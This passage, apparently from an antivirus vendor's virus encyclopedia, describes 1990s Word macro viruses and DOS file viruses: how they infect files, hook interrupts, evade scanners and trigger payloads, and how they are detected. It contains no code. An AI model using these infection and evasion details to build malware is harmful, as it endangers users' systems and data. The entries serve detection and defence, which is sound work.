(called macro stealth technique). When a user selects one of the options, WORD_CVCK1.A displays the following: " Chicken say ......... " an empty picture and " [pox-poX-pOX-POX-POx-Pox-pox] "", .Push2 The following comments can be found within the code: " -------------------------------------------- " " Created using CVCK v.01 b " " (C)CrazybitS 1997, Yogyakarta, Indonesia " " -------------------------------------------- " and " Sorry ... i'm defeat you ! " [WORD_CVCK1.B] Virus Name: WORD_CVCK1.B Virus Type: Word Macro Virus Alias: Foxz Platform: Word 6/7 Number_of_macros: 10 Encrypted: Yes Size_of_macros: 5551 Bytes Place_of_origin: Indonesia Date_of_origin: 1997 Payload: Yes Trigger_date: None Password: None Seen_In_The_Wild: No Seen_where: Description: WORD_CVCK1.B infects the global template when an infected document is opened. Further documents become infected when they are closed (AutoClose). WORD_CVCK1.B uses ToolsMacro and FileTemplates to make recognition of an infected document more difficult (called macro stealth technique). When a user selects one of the options, WORD_CVCK1.B displays the following: " Err = 0 " Another message is displayed on the 1st and 13th of each month. WORD_CVCK1.B also tries to disable printing on Sundays. The following comments can be found within the code: " Foxz members of NoMercy " " thank's for decrypt this virus " " you may learn the effect Or somthing Else " " bye,"."".""." " " Foxz " " If you found bug please contact me at " " idban"@" hotmail.com " and " Foxz Techno " " Member Of NoMercy " [WORD_CVCK1.C] Virus Name: WORD_CVCK1.C Virus Type: Word Macro Virus Alias: Vampire, 80e Platform: Word 6/7 Number_of_macros: 6 or 9 (global template) Encrypted: Yes Size_of_macros: 3158 (5759) Bytes Place_of_origin: Indonesia Date_of_origin: 1997 Destructive: Yes Trigger_date: Fridays Password: None Seen_In_The_Wild: No Seen_where: Description: WORD_CVCK1.C infects the global template when an infected document is opened. Further documents become infected when they are closed (AutoClose). WORD_CVCK1.C uses ToolsMacro, ToolCustomize and FileTemplates to make recognition of an infected document more difficult (called macro stealth technique). When a user selects one of the options, WORD_CVCK1.C deletes all WIN.* files in the Windows directory and displays the following message: " No risk, No Pain " Another payload triggers on Fridays when WORD_CVCK1.C erases all text from documents. The following comments can be found within the code of WORD_CVCK1.C: " Created using CVCK v.01 b " " (C)CrazybitS 1997, Yogyakarta, Indonesia " " Name : WM.80e aliase Vampire " [WORD_CVCK1.D] Virus Name: WORD_CVCK1.D Virus Type: Word Macro Virus Alias: Vampire, 80e Platform: Word 6/7 Number_of_macros: 6 or 9 (global template) Encrypted: Yes Size_of_macros: 3912 (5547) Bytes Place_of_origin: Indonesia Date_of_origin: 1997 Payload: Yes Trigger_date: 13th of each month Password: None Seen_In_The_Wild: No Seen_where: Description: WORD_CVCK1.D infects the global template when an infected document is opened. Further documents become infected when they are closed (AutoClose). WORD_CVCK1.D uses ToolsMacro, ToolCustomize and FileTemplates to make recognition of an infected document more difficult (called macro stealth technique). When a user selects one of the options, WORD_CVCK1.D displays the following message: (also displayed on the 13th of each month) " Visit NoMercy WEB PAGE ! " " Welcome Again buddy! " " It's nice create a Virus, why you don't try? " The following comments can be found within the code of WORD_CVCK1.D: " -------------------------------------------- " " Created using CVCK v.01 b " " (C)CrazybitS 1997, Yogyakarta, Indonesia " " -------------------------------------------- " " greeting to " " -Cicatrix major collector " " -D.Giovanni " " -All Macro virii creator " " -You that has seen the decription macro " and " Sorry ... i'm defeat you ! " [WORD_CVCK1.E] Virus Name: WORD_CVCK1.E Virus type: Word Macro Virus Alias: None Platform: Word 6/7 Number_of_macros: 10 Encrypted: Yes Size_of_macros: 5527 Bytes Place_of_origin: Indonesia Date_of_origin: 1997 Payload: Yes Trigger_date: Sundays Password: None Seen_In_The_Wild: No Seen_where: Description: The main difference between this new variant and the previous WORD_CVCK1.B viruses is that the Action, Actiondate, and AutoOpen macros were modified. WORD_CVCK1.E infects the global template when an infected document is opened. Further documents become infected when they are closed (AutoClose). WORD_CVCK1.E uses ToolsMacro and FileTemplates to make recognition of an infected document more difficult (called macro stealth technique). WORD_CVCK1.E also tries to disable printing on Sundays. The following comment can be found within the code of WORD_CVCK1.E: " -------------------------------------------- " " Hey you..... " " This again from NoMercy... " " created by Fox`z " " -------------------------------------------- " [WORD_CVCK1.F] Virus Name: WORD_CVCK1.F Virus type: Word Macro Virus Alias: Billy Mahone Platform: Word 6/7 Number_of_macros: 6 or 9 (global template) Encrypted: Yes Size_of_macros: 2209 or 2338 Bytes Place_of_origin: Unknown Date_of_origin: 1997 Payload: Yes Trigger_date: 13th of each month Password: None Seen_In_The_Wild: No Seen_where: Description: WORD_CVCK1.F seems to be the first macro virus, created with the CVCK1 virus generator, that was not modified after its creation. WORD_CVCK1.F infects the global template when an infected document is opened. Further documents become infected when they are closed (AutoClose). WORD_CVCK1.F uses ToolsMacro, ToolsCustomize and FileTemplates to make recognition of an infected document more difficult (called macro stealth technique). When WORD_CVCK1.F triggers (on the 13th of each month), it displays the following message: " Billy Mahone is back!!! " (More obscure than the virus itself is the name of the virus author, which is a character in the movie " Flatliners "). The following comment can be found within the code of WORD_CVCK1.G: " Sorry ... i'm defeat you ! " and " Just bypass Nothing to do! " [WORD_CVCK1.G] Virus Name: WORD_CVCK1.G Virus Type: Word Macro Virus Alias: None Platform: Word 6/7 Number_of_macros: 5 Encrypted: Yes Size_of_macros: 2029 Bytes Place_of_origin: Unknown Date_of_origin: 1997 Payload: Yes Trigger_date: 13th of each month Password: None Seen_In_The_Wild: No Seen_where: Description: WORD_CVCK1.G seems to be another creation of the author of WORD_CVCK1.F. It contains another reference to the movie "Flatliners." WORD_CVCK1.G infects the global template when an infected document is opened. Further documents become infected when they are closed (AutoClose). When WORD_CVCK1.G triggers (on the 13th of each month), it displays the following message: " Put me in the sate of death " The following comment can be found within the code of WORD_CVCK1.G: " Sorry ... i'm defeat you ! " and " Just bypass Nothing to do! " [WORD_CVCK1.H] Virus Name: WORD_CVCK1.H Virus Type: Word Macro Virus Alias: None Platform: Word 6/7 Number_of_macros: 5 Encrypted: Yes Size_of_macros: 2031 Bytes Place_of_origin: Unknown Date_of_origin: 1997 Payload: Yes Trigger_date: 13th of each month Password: None Seen_In_The_Wild: No Seen_where: Description: WORD_CVCK1.H seems to be another creation of the author of WORD_CVCK1.F and WORD_CVCK1.G! It contains another reference to the movie "Flatliners." WORD_CVCK1.H infects the global template when an infected document is opened. Further documents become infected when they are closed (AutoClose). When WORD_CVCK1.H triggers (on the 13th of each month), it displays the following message: " Today is a good day to die!!! " The following comment can be found within the code of WORD_CVCK1.H: " Sorry ... i'm defeat you ! " and " Just bypass Nothing to do! " [WORD_CVCK1.I] Virus Name: WORD_CVCK1.I Virus Type: Word Macro Virus Alias: None Platform: Word 6/7 Number_of_macros: 11 Encrypted: Yes Size_of_macros: 7329 Bytes Place_of_origin: Unknown Date_of_origin: 1997 Payload: Yes Trigger_date: 11th and 31st of each month Password: None Seen_In_The_Wild: No Seen_where: Description: The main difference between this new variant and the previous WORD_CVCK1.A virus is that the code has been slightly modified. For more information, please refer to the WORD_CVCK1.A virus description. [WORD_Czech.A] Virus Name: WORD_Czech.A Virus Type: Word Macro Virus Alias: None Platform: Word 6/7 Number_of_macros: 2 Encrypted: Yes Size_of_macros: 424 Bytes Place_of_origin: Unknown Date_of_origin: Spring 1997 Payload: None Trigger_date: None Password: None Seen_In_The_Wild: No Seen_where: Description: WORD_Czech.A infects the global template when an infected document is opened. Further documents become infected when they are also opened and saved (FileSave). WORD_Czech.A is another do-nothing macro virus, being only infectious. [Version] Virus Name: Version Virus Type: Memory resident, File Virus (COM files) Virus Length: 708 bytes PC Vector Hooked: INT 21h Execution Procedure: 1) It decodes its first three bytes. 2) Checks whether or not it is memory resident. If it is, goes back to the original routine directly. Otherwise, it loads itself resident in the high memory, then hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21h (AH=30h) to display an incorrect DOS version. 2) Hooks INT 21h (AX=4203h) to verify whether or not the memory has been infected (returns AX=6969h). 3) Hooks INT 21h(AX=4B00h)to infect COM files. Damage: The call for retrieving the DOS version does not run correctly. Note: This virus does not run correctly due to errors in its codes. Detection method: 1) Date and time fields of infected files are changed. 2) Infected files increase by 705 bytes. [Versikee-1326] Virus Name: Versikee-1326 Virus Type: File Virus (EXE files) Virus Length: 1326 bytes Execution Procedure: Searches for an uninfected EXE file and infects it (it only infects one file at a time). The searching path is from the current directory to its subdirectory, to subdirectories under the last subdirectory, to root directory, to subdirectories under the root directory. If there is an infectable file, it checks the system time. If the Seconds value is a multiple of 8, the virus destroys the first five bytes of the file. Otherwise, the virus just infects it. It then goes back to the original routine. Damage: Destroys the first five bytes of a file depending on the value of the Seconds field. Note: Date and time fields of infected files are not changed. Detection method: Length of infected files increase. The algorithm is: first it adds the original length to make it a multiple of 16, and then increases its length by 1326 bytes. [163] Virus Name: 163 Virus Type: File Virus (COM files) Virus Length: 163 bytes Execution Procedure: 1) Infects uninfected COM files on the current directory. If there are no COM files on the current directory or at least one file is already infected, the virus goes back to the original routine. Infection Procedure: (1) Moves the first 163 bytes of the original file at the end. (2) Writes the virus code onto the first 163 bytes. The file gets corrupted if it is less than 163 bytes. Damage: None Note: 1) Does not infect the same file. 2) Date and time fields of infected files are not changed. Detection method: 1) Infected files increase by 163 bytes. 2) Check for "*.COM" starting from the 19Dh byte of the file. [Vengence-A] Virus Name: Vengence-A Other Name: Vengence-194 Virus Type: File Virus (*.C* files) Virus Length: 194 bytes Execution Procedure: It infects all *.C* files on the current directory. Infection Procedure: Overwrites the first 194 bytes of the file with the virus code. If the original file is less than 194 bytes, the file will be 194 bytes after infection; otherwise, the length would not change. Damage: It overwrites the first 194 bytes of the original file with the virus code, thus corrupting the file. Detection method: 1) Date and time fields of infected files are changed. 2) The following text can be found at the end of infected files: "Vengence-A virus. Lastest release from Swedish Virus Association. Released 7th of May 1992. Happy hacking and greetings to all Virus writers..." [Vengence-B] Virus Name: Vengence-B Other Name: Vengence-252 Virus Type: File Virus (*.C*, mainly COM files) Virus Length: 252 bytes Execution Procedure: It infects *.C* files on the current directory. Infection Procedure: Overwrites the first 252 bytes of the file with the virus code. If the original file is less than 252 bytes, the file will be 252 bytes after infection; otherwise, the length would not change. Damage: It overwrites the first 252 bytes of the original file thus corrupting the file. Note: Date and time fields of infected files are not changed. Detection method: The following text can be found at the end of infected files: "Vengence-B virus. Lastest release from Swedish Virus Association. Released 8th of May 1992. Satan will come and rule his world and his people!" [Vengence-C] Virus Name: Vengence-C Other Name: Vengence-390 Virus Type: File Virus (*.C*, mainly COM files) Virus Length: 390 bytes Execution Procedure: It infects the first *.C* file on the current directory. Infection Procedure: Overwrites the first 390 bytes of the file with the virus code. If the original file is less than 390 bytes, the file will be 390 bytes after infection; otherwise, the length would not change. Damage: It overwrites the first 390 bytes of the original file thus corrupting the file. Note: 1) Date and time fields of infected files are not changed. 2) When the virus is executed, it checks first for any anti-virus software like F-LOCK, F-POPUP, F-FCHK, F-DLOCK, ThunderByte and TBSCANX. The virus stops executing if any of these programs exist. Detection method: The following text can be found at the end of infected files: "Vengence-C virus. Lastest release from Swedish Virus Association. Released 8th of May 1992. Satan will come and rule his world and his people!" [Vengence-D] Virus Name: Vengence-D Other Name: Vengence-435 Virus Type: File Virus (*.C*, mainly COM files) Virus Length: 435 bytes Execution Procedure: 1) Checks whether or not the current time is 12:00(AM). If it is, it displays the following message and then increases the system time by an hour. "Vengence-D virus. Lastest release from Swedish Virus Association. Released 8th of May 1992. Satan will come and rule his world and his people!" 2) Infects the first *.C* file on the current directory. Infection Procedure: Overwrites the first 435 bytes of the file with the virus code. If the original file is less than 435 bytes, the file will be 435 bytes after infection; otherwise, the length would not change. Damage: It overwrites the first 435 bytes of the original file thus corrupting the file. Note: 1) Date and time fields of infected files are not changed. 2) When the virus is executed, it checks first for any anti-virus software like F-LOCK, F-POPUP, F-FCHK, F-DLOCK, ThunderByte and TBSCANX. The virus stops executing if any of these programs exist. Detection method: Check for the text mentioned above. [Vengence-F] Virus Name: Vengence-F Other Name: Vengence-656 Virus Type: File Virus (*.C*, mainly COM files) Virus Length: 656 bytes Execution Procedure: 1) Checks whether or not the current time is 12:00(AM). If it is, it displays the following message and then increases the system time by an hour. "Vengence-F virus. Debugging session unlimited." 2) Infects the first *.C* file on the current, its father, its father's father directory, and so on. Infection Procedure: Moves the first 656 bytes of the file at the end and then writes the virus code onto the first 656 bytes. It then attaches "SVC" at the end of the file. Damage: Infected files cannot execute. Note: 1) Date and time fields of infected files are not changed. 2) When the virus is executed, it checks: - whether it is being traced by Debug. If it is, it halts the system. - for anti-virus programs like F-LOCK, F-POPUP, F-FCHK, F-DLOCK, ThunderByte and TBSCANX. If any of these programs exist, the virus stops executing. Detection method: 1) Check for the text mentioned above. 2) Check for the word "SVC" at the end of infected files. 3) Infected files increase by 656 bytes. Cleaning Method: Delete the first 656 bytes and "SVC" at the end of infected files. If the file is larger than 656 bytes, move the last 656 bytes up front. [V500] Virus Name: V500 Virus Type: Memory Resident(OS), File Virus (COM files) Virus Length: 500 bytes PC Vectors Hooked: INT 21H Execution Procedure: The virus checks whether the DOS version is 3.3. If not, it goes back to the original routine directly. Otherwise, it stays resident in the memory (OS area). While in the memory the virus calls INT 86h to infect COM files when INT 00h-0Ch is called. It then goes back to the original routine. The virus reinfects files. Infection Procedure: The virus moves the first 500 bytes of the file at the end, then writes the virus code on front. Damage: None Note: Date and time fields of infected files are not changed. Detection method: Infected files increase by 500 bytes. [Crazy-L15] Virus Name: Crazy-I15 Virus Type: Memory Resident(HiMem), File Virus (COM files) Virus Length: 1,402 bytes PC vectors Hooked: Int 21h, INT 24h Execution Procedure: 1) Checks whether or not it resides in the memory. If not, it loads itself resident in the high memory. 2) Hooks INT 21h. 3) Goes back to the original routine. Infection Procedure: Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing, then checks whether the program to be executed is an uninfected COM file. If it is, the virus infects it. Lastly, it restores INT 24h. Damage: None Detection method: Infected files increase by 1402 bytes. [Variety] Virus Name: Variety Virus Type: File Virus (COM files) Virus Length: 625 bytes Execution Procedure: 1) The virus decodes. 2) Infects a COM file on the current directory (it only infects one file at a time). Infection Procedure: 1) It encodes the virus code. 2) Attaches the viral code at the end of the original file. Damage: None Note: 1) If the DOS version is not above 2.0, the virus will not infect files. 2) Time and date fields of infected files are not changed. Detection method: Infected files increase by 625 bytes. [Infector] Virus Name: Infector Virus Type: File Virus (COM files) Virus Length: 820-830 bytes Execution Procedure: Searches for an uninfected COM file on the current directory, and then proceeds to infect it (it only infects one file at a time). Damage: None Note: 1) Most infected files cannot be executed due to the poor quality of the virus procedure. 2) Does not stay in the memory. 3) You will see an error message when writing because INT 24h has not been hanged. Detection method: Infected files increase by 820 to 830 bytes. [Irish-3] Virus Name: Irish-3 Virus Type: File Virus (COM files) Virus Length: 1164 bytes PC Vectors Hooked: INT 21h, INT 1Ch Execution Procedure: 1) Checks whether or not it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h,INT 1Ch and goes back to the original routine. Infection Procedure: Hooks INT 21H(AH=4Bh) to infect files. It checks whether the program to be executed is an uninfected COM file. If it is, the virus infects it. If it is an uninfected EXE file, the virus creates a new COM file (with length between 2000 and 4000 bytes) with the same file name as the original EXE file. This new COM file contains the virus code. Damage: None Note: 1) If the current date is November 21, it counts time by hooking INT 08h. After a few minutes, it displays the following message: "Virus V2.0 (c) 1991 Necros The Hacher Written on 29,30 June.................................. ...................." 2) You will see an error message when writing because INT 24h has not been hanged. Detection method: Infected files increase by 1164 bytes. [101] Virus Name: 101 Virus Type: File Virus Virus Length: 2560 bytes Execution Procedure: When all the files (COM and EXE) have been infected in the current drive, the virus will check the system date to determine whether it is a multiple of 9 (for example 9th, 18th, 27th). If "yes," all the text on the screen will be confused and down-shifted. If not the virus will modify the boot sector and continue to infect another drive. Damage: All the files (COM and EXE) will be infected and increased by 2560 Bytes. Infected file contains the string "VIRUS 101". [1339] Virus Name: 1339 Other Names: Vacsina virus Virus Type: Parasitic Virus Virus Length: 1339 bytes Symptoms: Increases infected .COM file sizes by 1339 bytes, .EXE files by 1471 bytes. Infected files contain the word "VACSINA". Decreases the size of free RAM memory. Damage: No damage, no manipulation. Note: First the virus tests to determine if it is already in memory (it uses interrupt vector 31h for this purpose). If it is not in memory yet, it installs itself before the infected program (using MCB modification, it allocates 1344 bytes). After installation the virus monitors DOS EXEC function and infects all uninfected programs. This virus is one of a group of viruses which cooperates with each other. This group has every virus of its own level, a virus can remove some other Vacsina with lower level 10h. It can remove viruses with level less than 10h. To spread, a Vacsina virus uses direct interrupt 21h. [1701/1704] Virus Name: 1701/1704 Other Names: Raindrop virus Virus Type: Parasitic Virus Virus Length: 1701/1704 bytes Symptoms: Increases infected .COM file sizes by 1701/1704 bytes when the system date is between October and December, 1988. Five minutes after installation, virus will scan all the characters on screen and down-shift one by one as if it were raining. Damage: No damage. System will halt after virus is activated. [2881] Virus Name: 2881 Other Names: Yankee Doodle virus Virus Type: Parasitic Virus Virus Length: 2881 bytes Symptoms: Increases infected file size by approximately 2881 bytes and decreases the size of free RAM memory. Infected .COM files display 7A4Fh and 2Ch as their end words (flagf for other viruses, for example: for Vacsina virus). Virus will play "Yankee Doodle" when some conditions are met (see damage). Damage: Ping-Pong virus modification: it modifies the Ping-Pong virus in memory. It changes two bytes, one jump and adds one subroutine. It is very interesting that Ping-Pong virus is ready for this change. After this reboot (it writes this count to all disks) and after 255 reboots, the Ping-Pong virus immediately deactivates into the memory (it returns original interrupt vector 13h and the value of 0:413h). Subsequently, "Yankee Doodle" is played. [2928] Virus Name: 2928 Other Names: Yankee Doodle virus Virus Type: Parasitic Virus Virus Length: 2928 bytes Symptoms: Increases infected file size by approximately 2928 bytes and decreases the size of free RAM memory. Infected .COM files display 7A4Fh and 29h as their end words (flagf for other viruses, for example: for Vacsina virus). Virus will play "Yankee Doodle" when some conditions are met (see damage). Damage: Ping-Pong virus modification: it modifies Ping-Pong virus in memory. It changes two bytes, one jump and adds one subroutine. (It's interesting that Ping-Pong virus is ready for this change.) After this reboot (it writes this count to all disks), and after 255 reboots, the Ping-Pong virus immediately deactivates into memory (it returns original interrupt vector 13h and the value of 0:413h). Subsequently, "Yankee Doodle" is played. Special features: It seems that this virus is an older version of the 2881 virus. It is also one of a large virus group. With its level 29h it is one of the previous releases of the same virus. It has the same mechamism, causes the same damage (except that virus 2881 doesn't play the melody every day, so it cannot be detected as early). The code of virus 2881 is optimized, so the new version is shorter (about 47 bytes). [3584] Virus Name: 3584 Other Names: Fish 6 Virus Type: Parasitic Virus, Memory resident Virus Length: 3584 bytes Symptoms: Increases infected file size by 3584 bytes. Decreases the size of free RAM memory by 6KB. Damage: Virus displays the message "FISH VIRUS #6 - EACH DIFF BONN 2/90 '~knzyvo}'" on the screen using function 9 of interrupt 21h and halts the computer using instruction HLT. [4096] Virus Name: Virus 4096 Virus Type: File Virus Virus Length: 4096 bytes Execution Procedure: A boot sector will be modified if the system date is later than September 21. The text "FRODO LIVES" will then appear on the screen after booting from a modified disk. The virus code is corrupted so that when you run the infected file after September 21, the system areas will not be modified, but the virus will cause the system to crash. Damage: Virus infects .COM files shorter than 61440 bytes and .EXE files. As a flag virus, it increases the year in the file's time stamp by 100 years. (DOS reports only the last two digits, so it cannot be easily recognized when, for example, the "DIR" command is executed). Detection Method: The virus increases infected file size by 4096 bytes. The operating memory is decreased by about 6 KB. [534] Virus Name: 534 Virus Type: Parasitic Virus Virus Length: 534 bytes Symptoms: Virus infects .COM files in the current directory or root directory that are longer than 256 bytes and shorter than 64000 bytes. Increases infected file size by 534 bytes and the file contains the string "????????.COM". [April 1st] Virus Name: April 1st Other Names: None Virus Type: File Virus Virus Length: 1488 bytes Execution Procedure: 1) The virus checks whether it is already loaded resident in the memory. If it is not, it loads itself by hooking INT 21h. 2) Next, it executes the original file. 3) Once it is resident in the memory it will infect any uninfected file that is executed. Damage: On April 1, the virus displays the message "APRIL 1ST HA HA HA YOU HAVE A VIRUS." After displaying the message, the virus halts the system. Detection Method: April 1st increases the size of .EXE files by 1488 bytes. Infected file contains the string "SURIV." Check to see if the file named "BUG.DAT" exists hidden in the C:\ directory. Notes: Loads itself resident in the memory. An error message appears if an I/O error (such as write protect) occurs. [Autumn] Virus Name: Autumn Other Names: Virus 1701, Cascade-B Virus Type: Parasitic Virus, RAM resident Virus Length: 1701 bytes PC Vectors Hooked: Int 21 Execution Procedure: 1) The virus checks whether it is already loaded resident in the memory. If it isn't, it loads itself by hooking INT 21h. 2) Next, it executes the original file. 3) Once it is resident in the memory it will infect any uninfected file that is executed. Damage: The Autumn virus causes characters to "fall down" the screen (Video-RAM modification). This does not happen frequently at the beginning but, as time goes by, the frequency of both the "fall down" and sound effects will increase. Semigraphic characters do not fall. Characters cannot fall over different video attributes. It doesn't work on monochrome monitors. The virus sometimes causes the computer to crash. Detection Method: Infected files increase in size by 1701 bytes. Notes: Loads itself resident in the memory. An error message appears if an I/O error (such as write protect) occurs. [Bogus-B] Virus Name: BOGUS-B Virus Type: File Virus (.COM and .EXE files) and Partition Table Infector Virus Length: No change PC Vectors Hooked: INT 21h, INT 24h, INT 13h Infection Process: 1) When you execute a file infected with the Bogus-B virus, it will check to see whether Sector #1 has been infected. If not, the virus will proceed to infect sector #1. 2) Next, it checks whether it is loaded resident in the memory. If it isn't, it loads itself by hooking INT 21h and INT 13h, and then executes the original file. 3) Once resident in the memory, the BOGUS-B virus can infect any executable programs. Damage: When the number of infected files exceeds 2710h, BOGUS-B destroys all data on the hard disk. Detection Method: Check to see if the file head is INT 13h (AX=90 or 91). If it is, check whether INT 21h is hooked. a) When starting the system, make 21_flag=3. b) Check whether INT 21h is called by other programs; if "yes", 21_flag is decreased by 1. c) When 21_flag=0, BOGUS hooks INT 21h to infect other files. 2) Check for any attempts to read sector #1; if there is, then display the original data of sector #1. 3) Check whether AX=90 or 91; if "yes", then execute the real interrupt. Notes: BOGUS hooks INT 24h when infecting files. It omits I/O errors (such as write protect). [Bulgarian Virus] Virus Name: Bulgarian Virus Other Names: Virus 1800, Sofia virus, Dark Avenger Virus Type: Parasitic Virus and Boot Strap Sector Virus Virus Length: Approx. 1800 bytes PC Vectors Hooked: Int 21 Infection Process: 1) The virus checks whether it is already loaded resident in the memory. If it's not, it loads itself by hooking INT 21h. 2) The virus then executes the original file. 3) Once it is resident in the memory the virus will infect any uninfected file that is executed. Damage: The virus reads the disk's boot sector, and (offset 10, OEM decimal version) marks the number of programs which were executed from the disk MOD 16. If it is zero (after every 16 programs!!), it overwrites a random cluster on the disk with part of its own code. The cluster number is then stored in the boot sector at offset 8 (OEM main version). The modified boot sector is then written back onto the disk. Detection Method: Infected files increase by 1800 bytes. Notes: 1) Loads itself resident in the memory. 2) Doesn't hook INT 24h when infecting files. An error message appears if an I/O error (such as write protect) occurs. [Cannabis-B] Virus Name: Cannabis-B Virus Type: File Infector Virus Length: None PC Vectors Hooked: None Execution Procedure: When a file infected with this virus is executed, a boot virus "Cannabis" is written onto the boot sector of the A drive. Damage: see Execution Procedure above. Detection Method: None Notes: Cannabis doesn't hook INT 24h when infecting files. It omits I/O errors (such as write protect). [Christmas] Virus Name: Christmas Other Namess: Virus 600, Xmas In Japan, Japanese Christmas Virus Type: File Virus (.COM files) Virus Length: 600 bytes Damage: When a file infected with this virus is executed on December 25, the following message will be displayed: "A Merry christmas to you" or "Jingo Bell, jingo bell, jingo all the way." Detection Method: The COMMAND.COM file increases in size by 600 bytes and infected .COM files increase in size by 600 bytes. [Comp-3351] Virus Name: Comp-3351 Virus Type: Parasitic Virus Virus Length: 3351 bytes Execution Process: Comp-3351 searches for an .EXE file in the current directory. It then creates a .COM file (hidden file) using the same file name as the .EXE file. The .COM file contains the virus code with length equivalent to 3351 bytes. Damage: None Detection Method: Length of the file is 3351 bytes. Remarks: 1) Non-memory resident. 2) The virus file is compressed and cannot be recognized before decompression (similar to PKLITE). [Como-B] Virus Name: Como-B Virus Type: File Virus (.EXE files) Virus Length: 2020 bytes PC Vectors Hooked: None Execution Procedure: 1) Searches for an .EXE file in the current directory and, once it locates one, it checks whether it has been infected by COMO-B. If the file is already infected, the virus continues to look for any uninfected .EXE file. 2) COMO-B infects files one at a time. 3) After infecting three files, the following message appears: "This is the ...COMO-LAKE .. virus(rel . 1 1).........I'm a non-destructive virus developed to study the worldwide diffusion rate. I was released in September 1990 by a software group resident near Como lake (north Italy) .....Don't worry about your data on disk. My activity is limited only .. to auto-transferring into other program files. Perhaps you've got .. many files infected. Press a key to execute the prompt. Damage: None Detection Method: Infected files increase by 2020 bytes. Notes: 1) Doesn't stay resident in the memory. 2) COMO doesn't hook INT 24h when infecting files. An error message appears if an I/O error (such as write protect) occurs. [Dark_Avenger] Virus Name: Dark_Avenger Alias: Eddie Virus Type: File Infector (.COM and .EXE files) Virus Length: 1,800 bytes PC Vectors Hooked: INT 21h Infection method: When an infected file is executed, the virus loads itself in the memory. While loaded, it infects accessed, executable files. Infected files increase by 1800 bytes. Damage: The virus reads the disk's boot sector and marks the number of programs executed from the disk. After every 16 programs, it overwrites a random cluster on the disk with part of its own code. The infected files contain these strings: "Eddie lives...somewhere in time! Diana P." "This program was written in the city of Sofia (C) 1988-89 Dark Avenger." [Data Crime IIB] Virus Name: Datacrime II b Other names: None Virus Type: File Virus Virus Length: 1460 bytes Damage: The virus will low-level format cylinder 0 of your hard disk after October 12. Detection Method: Between October 12-31, excluding Mondays, the virus will display the following message: "DATACRIME-2 VIRUS." The virus will then low-level format cylinder 0 of the hard disk. The system will then halt. [Deiced] Virus Name: Deiced Virus Type: File Infector, Highest Memory Resident ( .COM files only) Virus Length: 2333 bytes PC Vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether or not the virus has been loaded resident in the high memory. If not, it loads itself onto the highest memory by hooking INT 21h. 2) It checks whether the file COMMAND.COM has been infected. If not, the virus infects it. 3) Deiced checks the system date and, if it is the 15th of January, April or August, the virus will damage all files on the system disk. Infection Procedure: The virus infects a .COM file by hooking the AX=4B00h call (if the file is not infected). When the command "DIR" is executed, the virus will look for all uninfected files in the directory and proceed to infect them. Deiced hooks INT 24h to hide itself while infecting. Damage: If the system date is the 15th of January, April or August, the virus will damage all files on the system disk. Detection Method: Infected files increase by 2333 bytes. [Dropper-4] Virus Name: DROPPER-4 Virus Type: File Infector (.COM and .EXE files) Virus Length: 1125 bytes PC Vectors Hooked: INT 24h Execution Procedure: 1) The virus searches for an uninfected .COM or .EXE file in the current directory. 2) Infects files in the current directory two at a time. 3) Executes the original file. Damage: None Detection Method: Infected files increase by 1125 bytes. Notes: 1) Doesn't stay resident in the memory. 2) Dropper-4 hooks INT 24h when infecting files. It omits I/O errors (such as write protect). [Ell] Virus Name: ELL Other names: None Virus Type: File Infector (.COM and .EXE files) Virus Length: 1237-1246 bytes (EXE files) 1237 bytes (COM files) PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks whether or not it is memory resident. If not, it loads itself resident in the memory by hooking INT 21h. 2) It then executes the original file. 3) Once resident in the memory it will infect any uninfected file that is executed. Damage: None Detection Method: Increases infected file size by 1237/1246 bytes. Notes: Loads itself resident in the memory. An error message appears if there is an I/O error (such as write protect). [Elvis] Virus Name: Elvis Virus Type: File Infector (.COM files) Virus Length: 1250 bytes PC Vectors Hooked: INT 8h Execution Procedure: 1) The virus searches for uninfected COM files in the current directory, and infects them three at a time. 2) Hooks INT 8h and executes the original file. Damage: About eight (8) minutes after the virus is executed, one of these messages appears on the screen: 1) "Elvis lives!" 2) "ELVIS is watching!" 3) "Don maybe he lives here!.....," and so on. Detection Method: Infected files increase by 1250 bytes. Notes: 1) Doesn't stay resident in the memory. 2) Elvis doesn't hook INT 24h when infecting files. It omits I/O errors (such as write protect). [F3] Virus Name: F3 Virus Type: Memory Resident, File Virus (.COM and .EXE files) Virus Length: 50406 bytes PC Vectors Hooked: INT 21h, AX=4B00h (execute program), INT 24h Infection Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the highest memory by hooking INT 21h. 2) Checks the system date. If the date is April 1, two lines of code will appear on the screen. 3) Executes the original file. 4) Once memory resident it will infect any uninfected file that is executed. Damage: None Detection Method: Infected files increase by 50406 bytes. Notes: The F3 virus hooks INT 24h when infecting files. It omits I/O errors (such as write protect). [Flip-B] Virus Name: Flip-B Virus Type: File and Partition Table Infector Virus Virus Length: 2153 bytes PC Vectors Hooked: INT 21h, INT 24h, INT 1Ch Execution Procedure: 1) When you execute a file infected with Flip-B, the virus checks whether Sector #1 on the hard drive is infected. If not, the virus infects it. 2) Checks whether it is memory resident. If not, it loads itself resident in the memory by hooking INT 21h and INT 1Ch. 3) It infects files as they are executed. Damage: You may not be able to boot up the machine from the hard disk. Detection Method: Infected files increase by 2153 bytes. INT 1Ch: Detects whether INT 21h is constantly hooked by another program. Notes: Flip-B hooks INT 24h when infecting files, omitting I/O errors such as write protect. [Gp 1] Virus Name: Gp1 Virus Type: Network Specific Virus Virus Length: 1557 bytes (EXE files) 1845 bytes (COM files) Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the highest memory by hooking INT 21h. 2) Executes the original file. 3) Once memory resident it will infect any uninfected file that is executed. Symptoms: If the virus is active in the memory and if the first character on the command line is not an "i", the virus removes itself from the operating memory (this will work only if the virus is the last TSR to change interrupt vector 21h) and displays the message "GP1 Removed from memory." Damage: None. Gp1 is the only known LAN virus. This unique virus is a modification of the Jerusalem virus and was created for one special purpose: to penetrate Novell security features and spread inside the network. The virus does not contain any manipulation (if we do not count the monitoring of Novell LOGIN and the attempts to break the Novell security features). [Hiccup] Virus Name: Hiccup Aliases: Comp-3351 Virus Type: Parasitic Virus (infects .EXE files) Virus Length: 3351 bytes Execution Procedure: 1) Hiccup searches for an .EXE file in the current directory. 2) Creates a *.COM file (hidden file) consisting of the virus itself. When executed, the *.COM file executes, then returns to the original 